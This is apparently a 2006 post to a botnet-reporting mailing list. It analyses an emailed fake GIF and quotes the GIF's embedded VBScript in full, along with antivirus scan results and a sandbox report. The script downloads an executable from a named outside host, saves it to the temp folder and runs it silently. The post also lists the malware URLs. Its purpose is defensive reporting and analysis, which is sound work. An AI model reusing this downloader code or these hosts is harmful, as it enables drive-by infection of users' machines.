Tom
Fri, 29 Dec 2006 09:07:33 -0800
To report a botnet PRIVATELY please email: [EMAIL PROTECTED] ---------- This one was new to me. A gif that wasn't. Came via email. Link was tohttp://lulavergonha.rg3.net which framed a gif (http://mywebpage.netscape.com/lu7y7u/lula.gif) that firefox would not deal with. DOes explorer reall open these? Anyway, content of gif had javascript to download the maleware (beware below is an active link as of this email): <script language="VBScript"> on error resume next ' due to how ajax works, the file MUST be within the same local domain dl = "http://mywebpage.netscape.com/lu7y7u/lula.cmd"; ' create adodbstream object Set df = document.createElement("object") df.setAttribute "classid", "clsid:BD96C556-65A3-11D0-983A-00C04FC29E36" str="Microsoft.XMLHTTP" Set x = df.CreateObject(str,"") a1="Ado" a2="db." a3="Str" a4="eam" str1=a1&a2&a3&a4 str5=str1 set S = df.createobject(str5,"") S.type = 1 ' xml ajax req str6="GET" x.Open str6, dl, False x.Send ' Get temp directory and create our destination name fname1="pork.exe" set F = df.createobject("Scripting.FileSystemObject","") set tmp = F.GetSpecialFolder(2) ' Get tmp folder fname1= F.BuildPath(tmp,fname1) S.open ' open adodb stream and write contents of request to file ' like vbs dl exec code S.write x.responseBody ' Saves it with CreateOverwrite flag S.savetofile fname1,2 S.close set Q = df.createobject("Shell.Application","") Q.ShellExecute fname1,"","","open",0 </script> [ scan result ] AntiVir 7.3.0.21/20061229 found [TR/Delphi.Downloader.Gen] Authentium 4.93.8/20061229 found nothing Avast 4.7.892.0/20061221 found nothing AVG 386/20061229 found nothing BitDefender 7.2/20061229 found [Trojan.Downloader.Banload.MG] CAT-QuickHeal 8.00/20061229 found nothing ClamAV devel-20060426/20061229 found nothing DrWeb 4.33/20061229 found nothing eSafe 7.0.14.0/20061228 found nothing eTrust-InoculateIT 23.73.101/20061229 found nothing eTrust-Vet 30.3.3289/20061229 found nothing Ewido 4.0/20061229 found [Downloader.Delf.acn] F-Prot 3.16f/20061229 found nothing F-Prot4 4.2.1.29/20061229 found nothing Fortinet 2.82.0.0/20061229 found nothing Ikarus T3.1.0.27/20061229 found [Trojan-Downloader.Win32.Dadobra.CV] Kaspersky 4.0.2.24/20061229 found nothing McAfee 4928/20061228 found nothing Microsoft 1.1904/20061227 found nothing NOD32v2 1946/20061229 found [probably a variant of Win32/TrojanDownloader.Banload.BAY] Norman 5.80.02/20061229 found [W32/Downloader] Panda 9.0.0.4/20061228 found [Suspicious file] Prevx1 V2/20061229 found nothing Sophos 4.13.0/20061228 found nothing Sunbelt 2.2.907.0/20061218 found nothing TheHacker 6.0.3.139/20061229 found nothing UNA 1.83/20061228 found nothing VBA32 3.11.1/20061229 found nothing VirusBuster 4.3.19:9/20061229 found nothing [ notes ] norman sandbox: [ General information ] * **IMPORTANT: PLEASE SEND THE SCANNED FILE TO: [EMAIL PROTECTED] - REMEMBER TO ENCRYPT IT (E.G. ZIP WITH PASSWORD)**. * File length: 43520 bytes. [ Changes to filesystem ] * Creates file C:\WINDOWS\SYSTEM32\imgrt.scr. [ Network services ] * Downloads file from http://www.aquipodeserbom.xpg.com.br/firma01.bmp as C:\WINDOWS\SYSTEM32\imgrt.scr. [ Security issues ] * Starting downloaded file - potential security problem. -- Tom Shaw - Chief Engineer, OITC <[EMAIL PROTECTED]>, http://www.oitc.com/ US Phone Numbers: 321-984-3714, 321-729-6258(fax), 321-258-2475(cell/voice mail,pager) Text Paging: http://www.oitc.com/Pager/sendmessage.html AIM/iChat: [EMAIL PROTECTED] Google Talk: [EMAIL PROTECTED] skype: trshaw _______________________________________________ To report a botnet PRIVATELY please email: [EMAIL PROTECTED] All list and server information are public and available to law enforcement upon request. http://www.whitestar.linuxbox.org/mailman/listinfo/botnets
